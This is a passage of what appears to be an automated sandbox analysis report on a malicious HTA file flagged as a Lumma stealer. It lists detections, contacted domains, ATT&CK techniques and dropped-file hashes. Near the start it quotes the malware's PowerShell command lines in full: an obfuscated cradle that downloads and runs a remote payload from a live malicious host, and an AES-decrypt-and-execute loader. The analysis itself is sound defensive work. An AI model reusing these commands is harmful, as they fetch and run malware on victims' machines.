to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Unrestricted -Command ([System.Net.WebClient]::New().DownloadString('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([String]''.Chars)[15,24,19]-Join'') Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -ep unrestricted -nop function kvftj($wehz){-split($wehz -replace '..', '0x$& ')};$unmqfgpoo=kvftj('620986383d3dfad70991ffd7fe68bb1a4c7aaaf28c506bcdf3f15f05ff68be3a63c41c1344030f279ba099867889ec40a13815f6c3aa7db791480c369c06795cbf5c7123f251677434e1d735add7491972a4b8bb7c72126d19b19fa0f5cc454183b5ca613db9749b7a057f46c7d498c1b093495caee0d3e9a11fc6a4151c601e17ee5673011bdba93fde02de782233a7043bf49654b970adae05c1330e6a3199124aef9374b3a993d86dd9fee616a971a5625f90c5378e5b92a2241dd728e9bda316656189951d0b7c26d79c0709febf5245e7efd6b6e6cb91ecb4ff1c782878d4fadd937aeeb5925af95c6aff5fab094bad672d12d47a7bb427efae835f7cdd46114fa0531292dcb1a82508ecf719edec6d556a6010e5e3f8285c641df98887510875500bd33b137a114b9ae1e8ffd7bfd38cd20e845f94e6eca7240e7dd766768de33580115085bb1bf7be754ca76dfb25fbb67f1fd69b68f02abe7e019cbd16a364da8b02f2eb10a0d3077229356fa8dd4ca57a654cda196e6be7057ec0e026ca0f3254288fee7d7852c8a0c4f5eefa4afcffe45e5cf2de47a71487a38d65c0243902c7d78cf4f213d43497dd7ab9e9807cdbf3f223c051810449aabd687c068e56fda923d53253d5e025ad605fd5794135cfe260e673f8bca9a110f0a3f19479deded55d4cec120d4f50a2a96f594ccbd88ba83226b73962dfef39766364ce4f5fdc9a9ca599d61a6bcef948a0643bc72bd335ffb29c45eb66186289c3f3a23987d3ffc2fc048f4b82e039cf4b61');$awwt=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((kvftj('685677414c7863477477484e4e484643')),[byte[]]::new(16)).transformfinalblock($unmqfgpoo,0,$unmqfgpoo.length)); & $awwt.substring(0,3) $awwt.substring(3)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy unrestricted -command ([system.net.webclient]::new().downloadstring('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([string]''.chars)[15,24,19]-join'')
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w h -ep unrestricted -nop function kvftj($wehz){-split($wehz -replace '..', '0x$& ')};$unmqfgpoo=kvftj('620986383d3dfad70991ffd7fe68bb1a4c7aaaf28c506bcdf3f15f05ff68be3a63c41c1344030f279ba099867889ec40a13815f6c3aa7db791480c369c06795cbf5c7123f251677434e1d735add7491972a4b8bb7c72126d19b19fa0f5cc454183b5ca613db9749b7a057f46c7d498c1b093495caee0d3e9a11fc6a4151c601e17ee5673011bdba93fde02de782233a7043bf49654b970adae05c1330e6a3199124aef9374b3a993d86dd9fee616a971a5625f90c5378e5b92a2241dd728e9bda316656189951d0b7c26d79c0709febf5245e7efd6b6e6cb91ecb4ff1c782878d4fadd937aeeb5925af95c6aff5fab094bad672d12d47a7bb427efae835f7cdd46114fa0531292dcb1a82508ecf719edec6d556a6010e5e3f8285c641df98887510875500bd33b137a114b9ae1e8ffd7bfd38cd20e845f94e6eca7240e7dd766768de33580115085bb1bf7be754ca76dfb25fbb67f1fd69b68f02abe7e019cbd16a364da8b02f2eb10a0d3077229356fa8dd4ca57a654cda196e6be7057ec0e026ca0f3254288fee7d7852c8a0c4f5eefa4afcffe45e5cf2de47a71487a38d65c0243902c7d78cf4f213d43497dd7ab9e9807cdbf3f223c051810449aabd687c068e56fda923d53253d5e025ad605fd5794135cfe260e673f8bca9a110f0a3f19479deded55d4cec120d4f50a2a96f594ccbd88ba83226b73962dfef39766364ce4f5fdc9a9ca599d61a6bcef948a0643bc72bd335ffb29c45eb66186289c3f3a23987d3ffc2fc048f4b82e039cf4b61');$awwt=-join [char[]](([security.cryptography.aes]::create()).createdecryptor((kvftj('685677414c7863477477484e4e484643')),[byte[]]::new(16)).transformfinalblock($unmqfgpoo,0,$unmqfgpoo.length)); & $awwt.substring(0,3) $awwt.substring(3)Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy unrestricted -command ([system.net.webclient]::new().downloadstring('https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll'))|&( ([string]''.chars)[15,24,19]-join'') Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		11
    Process Injection    		21
    Virtualization/Sandbox Evasion    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Email Collection    		1
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		11
    Process Injection    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable Media3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
    Obfuscated Files or Information    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    DLL Side-Loading    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture4
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633868 Sample: lalaloopy.hta Startdate: 10/03/2025 Architecture: WINDOWS Score: 76 21 x72.eioae.shop 2->21 25 Antivirus detection for URL or domain 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 Yara detected Powershell download and execute 2->29 31 2 other signatures 2->31 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 33 Suspicious powershell command line found 9->33 12 powershell.exe 21 9->12         started        process6 process7 14 powershell.exe 15 7 12->14         started        17 conhost.exe 12->17         started        dnsIp8 23 x72.eioae.shop 172.67.173.214, 443, 49687 CLOUDFLARENETUS United States 14->23 19 conhost.exe 14->19         started        process9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    lalaloopy.hta28%VirustotalBrowse
    lalaloopy.hta18%ReversingLabsScript-JS.Trojan.Lummastealer

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://x72.eioae.shop/413a42a4100%Avira URL Cloudmalware
    https://x72.eioae.0%Avira URL Cloudsafe
    https://x72.eioae0%Avira URL Cloudsafe
    http://x72.eioae.shop100%Avira URL Cloudmalware
    https://x72.eioae.shop100%Avira URL Cloudmalware
    https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xll100%Avira URL Cloudmalware
    https://x72.eioaehZ4k0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    x72.eioae.shop
    		172.67.173.214
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://x72.eioae.shop/413a42a4c715693c37e5256e144fd76cc51160b74617024d.xllfalse
      • Avira URL Cloud: malware
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://x72.eioae.powershell.exe, 00000006.00000002.1326478181.0000000005322000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1292385003.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1326478181.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://x72.eioaepowershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/powershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://x72.eioae.shop/413a42a4powershell.exe, 00000001.00000002.1290736699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://x72.eioaehZ4kpowershell.exe, 00000001.00000002.1292385003.0000000004BB7000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1296975221.00000000059F8000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://x72.eioae.shoppowershell.exe, 00000006.00000002.1326478181.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1292385003.0000000004991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1326478181.0000000004FE1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1292385003.0000000004AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://x72.eioae.shoppowershell.exe, 00000006.00000002.1326478181.0000000005212000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.173.214
                            		x72.eioae.shopUnited States
                            		13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox version:42.0.0 Malachite
                            Analysis ID:1633868
                            Start date and time:2025-03-10 17:34:39 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 40s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:14
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:lalaloopy.hta
                            Detection:MAL
                            Classification:mal76.evad.winHTA@7/7@1/1
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 28
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .hta

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target mshta.exe, PID 6816 because there are no executed function
                            • Execution Graph export aborted for target powershell.exe, PID 564 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7156 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:35:41API Interceptor7x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            CLOUDFLARENETUShttps://tjjrotk.bishirian.my/Get hashmaliciousHTMLPhisherBrowse
                            • 104.21.112.1
                            Theresa Badham_blmgmxdkjbwlx.htmlGet hashmaliciousUnknownBrowse
                            • 172.66.0.227
                            svchost.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            https://manage.acces-contr0l.com.de/mainGet hashmaliciousUnknownBrowse
                            • 172.67.152.103
                            https://joysowl.life/Uub4CRgG6i?S=ryan_scott@office.comGet hashmaliciousUnknownBrowse
                            • 188.114.96.3
                            Enquiry for Product Availability and Prices March 2025.exeGet hashmaliciousFormBookBrowse
                            • 172.67.222.201
                            Online Notification.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 104.26.11.146
                            https://dc1.convertc.com/event/v1/80401460/82362114/recentpurc/208463838.0153674575/6/cV9sU2Hc/B751BVZb/X.wgBlUMmEtoL7lLreHRS.dIbQhLbIKHVgjj1IvzEh_5AuOYVcDstYG0DCzEP9XO2LU-/click?url=https://gamma.app/docs/Sayer-Regan-Thayer-LLP-siiq7nvr7y2s7k4?mode=present#card-um3vy81gbcrpf02Get hashmaliciousUnknownBrowse
                            • 104.18.11.200
                            https://tron2wq18ufc.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                            • 104.21.96.1
                            Revised attached statement of account PDF.exeGet hashmaliciousFormBookBrowse
                            • 172.67.139.39

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eSNKO05B241100201.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            SNKO05B241100201..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            SNKO05B241100201.exeGet hashmaliciousSnake KeyloggerBrowse
                            • 172.67.173.214
                            Inst#U0430ll.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                            • 172.67.173.214
                            sNtelKBdvr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            B599ZYjsg4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            LdksctiMff.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 172.67.173.214
                            gcXBQbWQ1p.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            lBRZwn7j6P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214
                            KQfgqxs3In.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 172.67.173.214

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):0.773832331134527
                            Encrypted:false
                            SSDEEP:3:NlllulF/:NllUF/
                            MD5:B69AF4C11912EA10036B27095CA4E1CF
                            SHA1:02C42147DF81CC605EC7D03EEE2A43030194E9EB
                            SHA-256:8FD71F7491246BA09C83B4AB42BC6355662963F0E0605309EDDA51D4AF16EA4D
                            SHA-512:DFA46E48B31D3251CE002A902A6F4646137CF57D16F1662BF89165CE0F21CBB051E1C5D013BACE23AE22F86FD623CDF49E8C272F6371087F210F355A90ADBB9F
                            Malicious:false
                            Reputation:low
                            Preview:@...e.................................../.......................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4diqki1n.34c.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfvamjg5.tvz.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fixhg05n.gti.psm1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiesp1wq.h1u.ps1

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KH9FAUH4U6YDH5UW2Y20.temp

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6224
                            Entropy (8bit):3.725626649004674
                            Encrypted:false
                            SSDEEP:96:BsP13Cyo8kvhkvCCtt9tLHHQiw9tLHHQiO:6PHrt9tL69tLE
                            MD5:6B312E6523EB6752D2D91A5C8A296947
                            SHA1:216A1D1C226B0DFC52A3D4E6FAA6CFBE01ACAF88
                            SHA-256:F996D86ACCC6DC9D7BC32021FBDA5B001D356749F106A0179EC83182F09FCE63
                            SHA-512:DE97FE3D5316AF33DF9B06E524E23CDD54C93A37FD79F4759904962E18170B2C12A2D43D39865C694AE7468067C7044E9928D17CA94B417209FA1A5F4DD71FFF
                            Malicious:false
                            Preview:...................................FL..................F.".. ...J.S.....}.T...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...5.Zp......u.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2jZn............................^.A.p.p.D.a.t.a...B.V.1.....jZp...Roaming.@......EW<2jZp...../......................}.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2jZn.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....gZ.k..Windows.@......EW<2jZn.....2........................W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2jZn.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2jZn.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2gZ.j....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2EWk3....u...........

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6224
                            Entropy (8bit):3.725626649004674
                            Encrypted:false
                            SSDEEP:96:BsP13Cyo8kvhkvCCtt9tLHHQiw9tLHHQiO:6PHrt9tL69tLE
                            MD5:6B312E6523EB6752D2D91A5C8A296947
                            SHA1:216A1D1C226B0DFC52A3D4E6FAA6CFBE01ACAF88
                            SHA-256:F996D86ACCC6DC9D7BC32021FBDA5B001D356749F106A0179EC83182F09FCE63
